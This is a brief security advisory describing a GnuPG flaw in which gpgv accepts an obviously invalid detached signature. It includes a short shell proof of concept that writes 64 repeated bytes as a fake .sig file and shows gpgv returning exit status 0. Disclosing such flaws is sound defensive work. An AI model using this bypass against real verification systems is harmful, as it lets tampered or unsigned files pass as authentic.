GnuPG Detached Signature Verification Bypass Vulnerability

GnuPG Detached Signature Verification Bypass Vulnerability

An exploit is not required.

An example demonstrating this issue was provided:

fortune >x.txt
perl -e 'print "\xca"x"64"' >x.txt.sig
gpgv x.txt.sig x.txt
echo $?

This creates a file as well as an obviously invalid detached signature file. The file is then successfully validated by 'gpgv', since the exit status is '0'.